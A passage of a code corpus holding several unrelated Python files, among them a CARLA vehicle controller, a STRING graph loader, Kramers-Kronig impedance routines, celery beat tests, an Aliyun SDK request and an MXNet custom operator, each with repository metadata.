| 30.611111 | 116 | 0.649728 |
73481aad09797ef9b1311c961ca2d484d4d510d8 | 4,357 | py | Python | srunner/scenariomanager/actorcontrols/npc_vehicle_control.py | supavit-siriwan/scenario_runner | bf729630ae8adae7dafb0638289650e81b2a7561 | [
"MIT"
] | 3 | 2021-03-12T07:35:42.000Z | 2022-03-11T07:20:53.000Z | srunner/scenariomanager/actorcontrols/npc_vehicle_control.py | supavit-siriwan/scenario_runner | bf729630ae8adae7dafb0638289650e81b2a7561 | [
"MIT"
] | 1 | 2021-05-27T17:08:53.000Z | 2021-05-27T17:08:53.000Z | srunner/scenariomanager/actorcontrols/npc_vehicle_control.py | supavit-siriwan/scenario_runner | bf729630ae8adae7dafb0638289650e81b2a7561 | [
"MIT"
] | 3 | 2019-10-31T04:12:26.000Z | 2020-03-25T21:38:50.000Z | #!/usr/bin/env python
# Copyright (c) 2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides an example control for vehicles
"""
import math
import carla
from agents.navigation.basic_agent import LocalPlanner
from agents.navigation.local_planner import RoadOption
from srunner.scenariomanager.carla_data_provider import CarlaDataProvider
from srunner.scenariomanager.actorcontrols.basic_control import BasicControl
class NpcVehicleControl(BasicControl):
"""
Controller class for vehicles derived from BasicControl.
The controller makes use of the LocalPlanner implemented in CARLA.
Args:
actor (carla.Actor): Vehicle actor that should be controlled.
"""
_args = {'K_P': 1.0, 'K_D': 0.01, 'K_I': 0.0, 'dt': 0.05}
def __init__(self, actor, args=None):
super(NpcVehicleControl, self).__init__(actor)
self._local_planner = LocalPlanner( # pylint: disable=undefined-variable
self._actor, opt_dict={
'target_speed': self._target_speed * 3.6,
'lateral_control_dict': self._args})
if self._waypoints:
self._update_plan()
def _update_plan(self):
"""
Update the plan (waypoint list) of the LocalPlanner
"""
plan = []
for transform in self._waypoints:
waypoint = CarlaDataProvider.get_map().get_waypoint(
transform.location, project_to_road=True, lane_type=carla.LaneType.Any)
plan.append((waypoint, RoadOption.LANEFOLLOW))
self._local_planner.set_global_plan(plan)
def _update_offset(self):
"""
Update the plan (waypoint list) of the LocalPlanner
"""
self._local_planner._vehicle_controller._lat_controller._offset = self._offset # pylint: disable=protected-access
def reset(self):
"""
Reset the controller
"""
if self._actor and self._actor.is_alive:
if self._local_planner:
self._local_planner.reset_vehicle()
self._local_planner = None
self._actor = None
def run_step(self):
"""
Execute on tick of the controller's control loop
Note: Negative target speeds are not yet supported.
Try using simple_vehicle_control or vehicle_longitudinal_control.
If _waypoints are provided, the vehicle moves towards the next waypoint
with the given _target_speed, until reaching the final waypoint. Upon reaching
the final waypoint, _reached_goal is set to True.
If _waypoints is empty, the vehicle moves in its current direction with
the given _target_speed.
If _init_speed is True, the control command is post-processed to ensure that
the initial actor velocity is maintained independent of physics.
"""
self._reached_goal = False
if self._waypoints_updated:
self._waypoints_updated = False
self._update_plan()
if self._offset_updated:
self._offset_updated = False
self._update_offset()
target_speed = self._target_speed
# If target speed is negavite, raise an exception
if target_speed < 0:
raise NotImplementedError("Negative target speeds are not yet supported")
self._local_planner.set_speed(target_speed * 3.6)
control = self._local_planner.run_step(debug=False)
# Check if the actor reached the end of the plan
if self._local_planner.done():
self._reached_goal = True
self._actor.apply_control(control)
if self._init_speed:
current_speed = math.sqrt(self._actor.get_velocity().x**2 + self._actor.get_velocity().y**2)
# If _init_speed is set, and the PID controller is not yet up to the point to take over,
# we manually set the vehicle to drive with the correct velocity
if abs(target_speed - current_speed) > 3:
yaw = self._actor.get_transform().rotation.yaw * (math.pi / 180)
vx = math.cos(yaw) * target_speed
vy = math.sin(yaw) * target_speed
self._actor.set_target_velocity(carla.Vector3D(vx, vy, 0))
| 35.137097 | 123 | 0.657104 |
7c5539778d429d4d4873a1a2fe69ced37de9aa3d | 3,499 | py | Python | bindings/python/ensmallen/datasets/string/halomonasboliviensislc1.py | AnacletoLAB/ensmallen_graph | b2c1b18fb1e5801712852bcc239f239e03076f09 | [
"MIT"
] | 5 | 2021-02-17T00:44:45.000Z | 2021-08-09T16:41:47.000Z | bindings/python/ensmallen/datasets/string/halomonasboliviensislc1.py | AnacletoLAB/ensmallen_graph | b2c1b18fb1e5801712852bcc239f239e03076f09 | [
"MIT"
] | 18 | 2021-01-07T16:47:39.000Z | 2021-08-12T21:51:32.000Z | bindings/python/ensmallen/datasets/string/halomonasboliviensislc1.py | AnacletoLAB/ensmallen | b2c1b18fb1e5801712852bcc239f239e03076f09 | [
"MIT"
] | 3 | 2021-01-14T02:20:59.000Z | 2021-08-04T19:09:52.000Z | """
This file offers the methods to automatically retrieve the graph Halomonas boliviensis LC1.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def HalomonasBoliviensisLc1(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Halomonas boliviensis LC1 graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Wether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
Wether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instace of Halomonas boliviensis LC1 graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="HalomonasBoliviensisLc1",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
| 33.32381 | 223 | 0.679337 |
1c8bc3c563ff7fe132279764f884e0c635527460 | 4,436 | py | Python | KKlib.py | msb002/imped2drt | 37247b8e29bc88b053bde8cf9b0981c3cf5c99cc | [
"MIT"
] | 3 | 2020-05-27T04:16:34.000Z | 2021-05-24T00:01:06.000Z | KKlib.py | msb002/imped2drt | 37247b8e29bc88b053bde8cf9b0981c3cf5c99cc | [
"MIT"
] | null | null | null | KKlib.py | msb002/imped2drt | 37247b8e29bc88b053bde8cf9b0981c3cf5c99cc | [
"MIT"
] | 3 | 2020-02-03T18:16:18.000Z | 2020-06-23T11:31:17.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 24 16:36:57 2018
Last Updated: Jan 17 2020
@author: NicoleCreange
Based on work by Yoed Tsur
"""
#%%
import numpy as np
import matplotlib.pyplot as plt
np.seterr(divide='ignore', invalid='ignore')
def KKT_i2r(ww,z):
l = len(z)
KKTr = []
ww= ww*2*np.pi
for ii in range(0,l):
KKT = []
for jj in range(0,l):
if jj!=ii:
x = (ww[jj]*z[jj].imag - ww[ii]*z[ii].imag)/(ww[jj]**2 - ww[ii]**2)
if jj==ii and jj!=0 and jj!=l-1:
x = 0.5*((z[jj].imag/ww[jj]) + ((z[jj+1].imag - z[jj-1].imag)/(ww[jj+1] - ww[jj-1])))
if jj==ii and jj==0 and jj!=l-1:
x = 0.5*(z[jj].imag/ww[jj] + ((z[jj+1].imag-z[jj].imag)/(ww[jj+1]-ww[jj])))
if jj==ii and jj!=0 and jj==l-1:
x = 0.5*((z[jj].imag/ww[jj]) + ((z[jj].imag-z[jj-1].imag)/(ww[jj]-ww[jj-1])))
KKT.append(x)
from scipy.interpolate import CubicSpline as scaps
cs = scaps(ww,KKT)
rekk = 0
for mm in range(l-1):
trap = (KKT[mm+1] + KKT[mm])/2
dw = ww[mm+1]-ww[mm]
rekk = rekk + trap*dw
KKTr.append((2/np.pi)*rekk + z[-1].real)
return KKTr
def KKT_r2i(ww,z): #what Yoed has
l = len(z)
ww= ww*2*np.pi
KKTi = []
for ii in range(0,l):
KKT = []
for jj in range(0,l):
if jj!=ii:
x = (z[jj].real - z[ii].real)/(ww[jj]**2 - ww[ii]**2)
if jj==ii and jj!=0 and jj!=l-1:
x = ((z[jj+1].real - z[jj-1].real)/(ww[jj+1] - ww[jj-1]))/(2*ww[jj])
if jj==ii and jj==0 and jj!=l-1:
x = ((z[jj+1].real - z[jj].real)/(ww[jj+1]-ww[jj]))/(2*ww[jj])
if jj==ii and jj!=0 and jj==l-1:
x = ((z[jj].real - z[jj-1].real)/(ww[jj]-ww[jj-1]))/(2*ww[jj])
KKT.append(x)
from scipy.interpolate import CubicSpline as scaps
cs = scaps(ww,KKT)
imkk = 0
for mm in range(l-1):
trap = (KKT[mm+1] + KKT[mm])/2
dw = ww[mm+1]-ww[mm]
imkk = imkk + trap*dw
KKTi.append((2*ww[ii]/np.pi)*imkk)
return KKTi
#%%
def KKT(w,Z,thres=0.2,clean=False):
import matplotlib.pyplot as plt
# check for order of data. Needs to be low frequency to high frequency
order = w[0]-w[-1]
print(order)
if order > 0:
w = np.flipud(w)
Z = np.flipud(Z)
zr = Z.real
zi = Z.imag
z = zr-1j*zi
KKTimag = KKT_r2i(w,z)
KKTreal = KKT_i2r(w,z)
KKw = w
fig,axs = plt.subplots(nrows=2,ncols=2,figsize=(8,5))
if clean==True:
KKTdata = np.asarray(KKTreal)+1j*np.asarray(KKTimag)
wc,Zdata = KKT_clean(w,Z,KKTdata,thres)
axs[0,1].semilogx(wc,Zdata.real,'b.',label = "$Z_{exp}$'")
axs[0,1].semilogx(wc,-Zdata.imag,'k.',label = '$Z_{exp}$"')
axs[0,1].semilogx(w,Z.real,'b:')
axs[0,1].semilogx(w,-Z.imag,'k:')
axs[0,1].semilogx(KKw,np.asarray(KKTreal),'g',label = 'KKT real')
axs[0,1].semilogx(KKw,-np.asarray(KKTimag),'r',label = 'KKT imag')
axs[0,1].ticklabel_format(style='sci',axis='y',scilimits=(0,0))
axs[0,1].set_xlabel('Frequency (Hz)')
axs[0,1].set_ylabel('|Z|')
axs[0,1].legend(fontsize=8)
return fig,axs,wc,Zdata
else:
axs[0,1].semilogx(w,Z.real,'b.',label = "$Z_{exp}$'")
axs[0,1].semilogx(w,-Z.imag,'k.',label = '$Z_{exp}$"')
axs[0,1].semilogx(KKw,np.asarray(KKTreal),'g',label = 'KKT real')
axs[0,1].semilogx(KKw,-np.asarray(KKTimag),'r',label = 'KKT imag')
axs[0,1].ticklabel_format(style='sci',axis='y',scilimits=(0,0))
axs[0,1].set_xlabel('Frequency (Hz)')
axs[0,1].set_ylabel('|Z|')
axs[0,1].legend(fontsize=8)
return fig,axs,w,Z
def KKT_clean(w,Z,KKTdata,thres):
import numpy as np
res_real = (KKTdata.real-Z.real)
res_imag = (KKTdata.imag-Z.imag)
if np.sum(res_real) > np.sum(res_imag):
rem_r = [np.abs(res_real) > np.abs(Z.real)*thres]
indx_r = np.where(rem_r[0]==True)
z_clean = np.delete(Z,indx_r)
wc = np.delete(w,indx_r)
else:
rem_i = [np.abs(res_imag) > np.abs(Z.imag)*thres]
indx_i = np.where(rem_i[0]==True)
z_clean = np.delete(Z,indx_i)
wc = np.delete(w,indx_i)
return wc,z_clean
| 35.488 | 101 | 0.516907 |
c8495af283ea9900215809a06168ff061bf5f6ea | 841 | py | Python | Workshops-S2020/entry_test/chess.py | cmlimm/uni-projects | b63ac71cc0b971c7f035096a6bd15b0cbb5bb9f6 | [
"MIT"
] | null | null | null | Workshops-S2020/entry_test/chess.py | cmlimm/uni-projects | b63ac71cc0b971c7f035096a6bd15b0cbb5bb9f6 | [
"MIT"
] | null | null | null | Workshops-S2020/entry_test/chess.py | cmlimm/uni-projects | b63ac71cc0b971c7f035096a6bd15b0cbb5bb9f6 | [
"MIT"
] | 1 | 2020-10-29T18:31:32.000Z | 2020-10-29T18:31:32.000Z | def same_color(x1, y1, x2, y2):
same_row = (x2 - x1) % 2 + 1
same_column = (y2 - y1) % 2 + 1
return same_row == same_column
def queen(x1, y1, x2, y2):
if y1 == y2:
return True
if x1 == x2:
return True
if abs(x2 - x1) == abs(y2 - y1):
return True
return False
def knight(x1, y1, x2, y2):
moves = [[-2, -1], [-2, +1], [+2, -1], [+2, +1], [-1, -2], [-1, +2], [+1, -2], [+1, +2]]
for move in moves:
if x1 + move[0] == x2 and y1 + move[1] == y2:
return True
return False
x1 = int(input())
y1 = int(input())
x2 = int(input())
y2 = int(input())
print("Клетки одного цвета: ", same_color(x1, y1, x2, y2))
print("Ферзь на первой клетке бьет вторую клетку: ", queen(x1, y1, x2, y2))
print("Конь на первой клетке бьет вторую клетку: ", knight(x1, y1, x2, y2))
| 24.735294 | 92 | 0.527943 |
3a7b04626a9e049d7b7477d76dfde7bac642e058 | 5,155 | py | Python | example/tests/test_utils.py | ZipDeal-LLC/django-tenants-celery-beat | 7eea658502289385b64b9dbd25e73d85db563516 | [
"MIT"
] | 4 | 2021-02-26T22:50:47.000Z | 2021-06-05T07:59:43.000Z | example/tests/test_utils.py | ZipDeal-LLC/django-tenants-celery-beat | 7eea658502289385b64b9dbd25e73d85db563516 | [
"MIT"
] | 15 | 2021-02-26T22:54:56.000Z | 2022-02-22T18:52:11.000Z | example/tests/test_utils.py | ZipDeal-LLC/django-tenants-celery-beat | 7eea658502289385b64b9dbd25e73d85db563516 | [
"MIT"
] | 2 | 2021-12-07T03:57:32.000Z | 2022-02-25T17:37:06.000Z | from celery.schedules import crontab
from django.test import TestCase
from django_tenants_celery_beat.utils import generate_beat_schedule
from tenancy.models import Tenant
class GenerateBeatScheduleTestCase(TestCase):
@classmethod
def setUpTestData(cls):
Tenant.objects.bulk_create(
[
Tenant(name="Tenant 1", schema_name="tenant1", timezone="Europe/London"),
Tenant(name="Tenant 2", schema_name="tenant2", timezone="US/Eastern"),
]
)
def test_public(self):
expected = {
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(),
"options": {
"headers": {"_schema_name": "public", "_use_tenant_timezone": False}
}
}
}
beat_schedule = generate_beat_schedule(
{
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(),
"tenancy_options": {
"public": True,
"all_tenants": False,
"use_tenant_timezone": False,
}
},
}
)
self.assertEqual(beat_schedule, expected)
def test_all_tenants(self):
expected = {
"tenant1: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {"headers": {"_schema_name": "tenant1", "_use_tenant_timezone": False}}
},
"tenant2: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {"headers": {"_schema_name": "tenant2", "_use_tenant_timezone": False}}
}
}
beat_schedule = generate_beat_schedule(
{
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"tenancy_options": {
"public": False,
"all_tenants": True,
"use_tenant_timezone": False,
}
},
}
)
self.assertEqual(beat_schedule, expected)
def test_public_all_tenants(self):
expected = {
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {
"headers": {
"_schema_name": "public", "_use_tenant_timezone": False
}
}
},
"tenant1: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {
"headers": {
"_schema_name": "tenant1", "_use_tenant_timezone": False
}
}
},
"tenant2: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {
"headers": {
"_schema_name": "tenant2", "_use_tenant_timezone": False
}
}
}
}
beat_schedule = generate_beat_schedule(
{
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"tenancy_options": {
"public": True,
"all_tenants": True,
"use_tenant_timezone": False,
}
},
}
)
self.assertEqual(beat_schedule, expected)
def test_use_tenant_timezone(self):
expected = {
"tenant1: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(0, 1),
"options": {
"headers": {
"_schema_name": "tenant1", "_use_tenant_timezone": True
}
}
},
"tenant2: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(0, 1),
"options": {
"headers": {
"_schema_name": "tenant2", "_use_tenant_timezone": True
}
}
}
}
beat_schedule = generate_beat_schedule(
{
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(0, 1),
"tenancy_options": {
"public": False,
"all_tenants": True,
"use_tenant_timezone": True,
}
},
}
)
self.assertEqual(beat_schedule, expected)
| 34.139073 | 98 | 0.423084 |
75a23d165ab06834cd65428a1c5ac0b5cc414059 | 1,846 | py | Python | aliyun-python-sdk-outboundbot/aliyunsdkoutboundbot/request/v20191226/DescribeGlobalQuestionRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 1,001 | 2015-07-24T01:32:41.000Z | 2022-03-25T01:28:18.000Z | aliyun-python-sdk-outboundbot/aliyunsdkoutboundbot/request/v20191226/DescribeGlobalQuestionRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 363 | 2015-10-20T03:15:00.000Z | 2022-03-08T12:26:19.000Z | aliyun-python-sdk-outboundbot/aliyunsdkoutboundbot/request/v20191226/DescribeGlobalQuestionRequest.py | yndu13/aliyun-openapi-python-sdk | 12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5 | [
"Apache-2.0"
] | 682 | 2015-09-22T07:19:02.000Z | 2022-03-22T09:51:46.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkoutboundbot.endpoint import endpoint_data
class DescribeGlobalQuestionRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'OutboundBot', '2019-12-26', 'DescribeGlobalQuestion','outboundbot')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_GlobalQuestionId(self):
return self.get_query_params().get('GlobalQuestionId')
def set_GlobalQuestionId(self,GlobalQuestionId):
self.add_query_param('GlobalQuestionId',GlobalQuestionId)
def get_ScriptId(self):
return self.get_query_params().get('ScriptId')
def set_ScriptId(self,ScriptId):
self.add_query_param('ScriptId',ScriptId)
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId) | 36.92 | 97 | 0.773564 |
6a98452e1263179798b6f5dce8af36b9d044726e | 8,141 | py | Python | src/parser/page_content.py | cclauss/jahia2wp | e8d01aac2f545742df2fa18189178afd0c451056 | [
"MIT"
] | 9 | 2017-09-26T08:15:53.000Z | 2019-02-28T12:21:34.000Z | src/parser/page_content.py | cclauss/jahia2wp | e8d01aac2f545742df2fa18189178afd0c451056 | [
"MIT"
] | 768 | 2017-09-15T09:05:48.000Z | 2020-02-12T00:53:06.000Z | src/parser/page_content.py | cclauss/jahia2wp | e8d01aac2f545742df2fa18189178afd0c451056 | [
"MIT"
] | 11 | 2017-10-04T15:00:59.000Z | 2019-07-18T07:05:03.000Z | """(c) All rights reserved. ECOLE POLYTECHNIQUE FEDERALE DE LAUSANNE, Switzerland, VPSI, 2017"""
from datetime import datetime
from parser.box import Box
from parser.navigation_page import NavigationPage
from settings import JAHIA_DATE_FORMAT
from parser.sidebar import Sidebar
import logging
import re
from utils import Utils
class PageContent:
"""
The language specific data of a Page
"""
def __init__(self, page, language, element):
self.element = element
self.page = page
self.site = page.site
self.wp_id = None
self.language = language
# the relative path, e.g. /team.html
self.path = ""
self.vanity_urls = []
self.boxes = []
self.sidebar = Sidebar()
self.last_update = ""
# a list of NavigationPages
self.navigation = []
# the number of occurrences of each tag, e.g. "br" : 10
self.num_tags = {}
self.parse_title()
# last update
self.parse_last_update()
# sidebar
self.parse_sidebar()
# path
self.set_path()
# navigation
self.parse_navigation()
# add to the site PageContents
self.site.pages_content_by_path[self.path] = self
def parse_title(self):
"""
Page have a default title but it can be overrided by another title.
:return:
"""
# For menu title, we have to use default page title
self.menu_title = self.element.getAttribute("jahia:title")
self.title = ""
# Looking if there is an overrided page title (that will be used only on page). We have to look only
# in direct children otherwise there's a risque we get a child page's title.
page_list_list = Utils.get_dom_next_level_children(self.element, "pageTitleListList")
if page_list_list:
self.title = page_list_list[0].getElementsByTagName('pageTitle')
if self.title:
# Can have a value or be empty
self.title = self.title[0].getAttribute("jahia:value")
# If page title is empty (equal to "")
if not self.title:
# We use the menu title as page title
self.title = self.menu_title
def parse_last_update(self):
"""Parse the last update information"""
date = self.element.getAttribute("jcr:lastModified")
try:
if date:
self.last_update = datetime.strptime(date, JAHIA_DATE_FORMAT)
else:
logging.warning(
"%s - parse - For the page id=%s the last update date is empty",
self.site.name, self.page.pid)
except ValueError as e:
logging.error(
"%s - parse - Invalid last update date for page %s : '%s'",
self.site.name, self.page.pid, date)
raise e
def parse_sidebar(self):
""" Parse sidebar """
# search the sidebar in the page xml content
children = self.element.childNodes
for child in children:
if child.nodeName == "extraList":
for extra in child.childNodes:
if extra.ELEMENT_NODE != extra.nodeType:
continue
# If we have to skip this box,
if extra.getAttribute("jahia:acl") == "break":
continue
multibox = extra.getElementsByTagName("text").length > 1
box = Box(site=self.site, page_content=self, element=extra, multibox=multibox, is_in_sidebar=True)
self.sidebar.boxes.append(box)
nb_boxes = len(self.sidebar.boxes)
# if we don't have boxes in this sidebar we check the parents
if nb_boxes == 0:
parent = self.page.parent
while parent:
# Check if parent have a content in current lang
if self.language in parent.contents:
sidebar = parent.contents[self.language].sidebar
# we found a sidebar with boxes, we stop
if len(sidebar.boxes) > 0:
self.sidebar = sidebar
break
# otherwise we continue in the hierarchy
parent = parent.parent
def set_path(self):
"""
Set the page path
"""
if self.page.is_homepage():
if "en" == self.language:
self.vanity_urls = ["/index.html"]
else:
self.vanity_urls = ["/index-{}.html".format(self.language)]
else:
# Vanity URL can have the following content :
# one URL ==> '/sciences_donnees$$$true$$$true==='
# many URLs ==> '/sciences_donnees$$$true$$$true===/sciencesdonnees$$$true$$$false==='
# many URLs ==> '/sciences_donnees$$$true$$$false===/sciencesdonnees$$$true$$$false==='
vanity_url = self.element.getAttribute("jahia:urlMappings")
if vanity_url:
# Going through exploded parts
for url in vanity_url.split('$$$'):
# Cleaning content
url = re.sub(r'(true|false)(===)?', '', url)
if url:
self.vanity_urls.append(url)
# By default, we also add the "default" page name because it can also be used even if there are
# vanity URLs defined.
self.vanity_urls.append("/page-{}-{}.html".format(self.page.pid, self.language))
# If website has only one language, we also add another way to reach page, the URL without the language
# FIXME: It may also work if website have more than one language and in this case, URL without language
# points on the default language URL.
if len(self.site.languages) == 1:
# Add if not exists
url_without_lang = "/page-{}.html".format(self.page.pid)
if url_without_lang not in self.vanity_urls:
self.vanity_urls.append(url_without_lang)
# FIXME, the prefixing part should be done in exporter
# add the site root_path at the beginning
self.path = self.site.root_path + self.vanity_urls[0]
def parse_navigation(self):
"""Parse the navigation"""
navigation_pages = self.element.getElementsByTagName("navigationPage")
for navigation_page in navigation_pages:
# check if the <navigationPage> belongs to this page
if not self.site.belongs_to(element=navigation_page, page=self.page):
continue
for child in navigation_page.childNodes:
# internal page declared with <jahia:page>
if child.nodeName == "jahia:page":
template = child.getAttribute("jahia:template")
# we don't want the sitemap
if not template == "sitemap":
ref = child.getAttribute("jcr:uuid")
title = child.getAttribute("jahia:title")
self.add_navigation_page(type="internal", ref=ref, title=title)
# internal page declared with <jahia:link>
elif child.nodeName == "jahia:link":
ref = child.getAttribute("jahia:reference")
title = child.getAttribute("jahia:title")
self.add_navigation_page(type="internal", ref=ref, title=title)
# external page
elif child.nodeName == "jahia:url":
ref = child.getAttribute("jahia:value")
title = child.getAttribute("jahia:title")
self.add_navigation_page(type="external", ref=ref, title=title)
def add_navigation_page(self, type, ref, title):
"""Add a NavigationPage with the given info"""
navigation_page = NavigationPage(parent=self, type=type, ref=ref, title=title)
self.navigation.append(navigation_page)
| 37.516129 | 118 | 0.567498 |
66d254c0366bc77f869e921b41ba73a49bffc5f3 | 231 | py | Python | causalml/__init__.py | waltherg/causalml | c99ebc5d05a41c8384feaf7e3c144b2b1b65f826 | [
"Apache-2.0"
] | null | null | null | causalml/__init__.py | waltherg/causalml | c99ebc5d05a41c8384feaf7e3c144b2b1b65f826 | [
"Apache-2.0"
] | null | null | null | causalml/__init__.py | waltherg/causalml | c99ebc5d05a41c8384feaf7e3c144b2b1b65f826 | [
"Apache-2.0"
] | 1 | 2021-02-07T05:57:29.000Z | 2021-02-07T05:57:29.000Z | name = 'causalml'
__version__ = '0.8.0'
__all__ = ['dataset',
'features',
'feature_selection',
'inference',
'match',
'metrics',
'optimize',
'propensity']
| 21 | 31 | 0.450216 |
ea70a57bf3ffdd8d5e007b3cb6ddf805d6640ef5 | 1,398 | py | Python | dffml/tests/test_typing.py | aghinsa/deploy_test_cvt_gif | 6cca54080d3bf0fc9b7fd69f3d56634ab0351fdb | [
"MIT"
] | 1 | 2021-10-01T18:37:15.000Z | 2021-10-01T18:37:15.000Z | dffml/tests/test_typing.py | aghinsa/deploy_test_cvt_gif | 6cca54080d3bf0fc9b7fd69f3d56634ab0351fdb | [
"MIT"
] | null | null | null | dffml/tests/test_typing.py | aghinsa/deploy_test_cvt_gif | 6cca54080d3bf0fc9b7fd69f3d56634ab0351fdb | [
"MIT"
] | 1 | 2021-10-01T18:37:19.000Z | 2021-10-01T18:37:19.000Z | from typing import Dict, Any, NamedTuple, Optional
from typing import NewType
from dataclasses import dataclass
# from dffml.df.types import Definition
class Definition:
"""
List[type] is how to specify a list
"""
def __new__(cls, *args, **kwargs):
obj = super().__new__(cls)
# print(f"New was called,{args}\n kwargs : {kwargs}")
obj.__init__(*args, **kwargs)
custom_obj = NewType(obj.name, obj.primitive)
# custom_obj = type(obj.name,)
# custom_obj.name = obj.name
# custom_obj.lock = obj.lock
# custom_obj.spec = obj.spec
print("yes")
return custom_obj
def __init__(
self,
name: str,
primitive: str,
lock: bool = False,
spec: Optional[NamedTuple] = None,
):
# print(f"Init is called")
self.name = name
self.primitive = primitive
self.lock = lock
self.spec = spec
def __call__(self, val):
pass
def __repr__(self):
return self.name
def __str__(self):
return repr(self)
URL = Definition(name="URL", primitive="str", lock=True)
# print(URL0==URL)
# ss = type("url",("Dict[str,Any]",),{})
def type_test(obj: "URL"):
return 1
# typechecks
aa = "aa"
user_a = type_test(URL(aa))
print(user_a)
# does not typecheck; an int is not a UserId
# user_b = get_user_name(-1)
| 22.548387 | 61 | 0.594421 |
627ec62df6cead73846b0f50d165b38207754cde | 4,987 | py | Python | example/gan/mxgan/custom_ops.py | Liuxg16/BrainMatrix | 0ec70edd4e12dd3719d20dd14d4e24438c60326f | [
"Apache-2.0"
] | 249 | 2016-06-17T17:59:14.000Z | 2021-05-31T09:56:17.000Z | example/gan/mxgan/custom_ops.py | Liuxg16/BrainMatrix | 0ec70edd4e12dd3719d20dd14d4e24438c60326f | [
"Apache-2.0"
] | 9 | 2016-09-29T06:11:41.000Z | 2018-11-18T16:09:30.000Z | example/gan/mxgan/custom_ops.py | Liuxg16/BrainMatrix | 0ec70edd4e12dd3719d20dd14d4e24438c60326f | [
"Apache-2.0"
] | 64 | 2016-06-17T22:40:26.000Z | 2020-05-16T00:31:58.000Z | """Customized operators using NDArray GPU API"""
import numpy as np
import mxnet as mx
import pickle as pkl
class LogSumExpOp(mx.operator.CustomOp):
"""Implementation of log sum exp for numerical stability
"""
def __init__(self, axis):
self.axis = axis
def forward(self, is_train, req, in_data, out_data, aux):
x = in_data[0]
max_x = mx.nd.max_axis(x, axis=self.axis, keepdims=True)
sum_x = mx.nd.sum(mx.nd.exp(x - max_x), axis=self.axis, keepdims=True)
y = mx.nd.log(sum_x) + max_x
y = y.reshape(out_data[0].shape)
self.assign(out_data[0], req[0], y)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
y = out_grad[0]
x = in_data[0]
max_x = mx.nd.max_axis(x, axis=self.axis, keepdims=True)
y = y.reshape(max_x.shape)
x = mx.nd.exp(x - max_x)
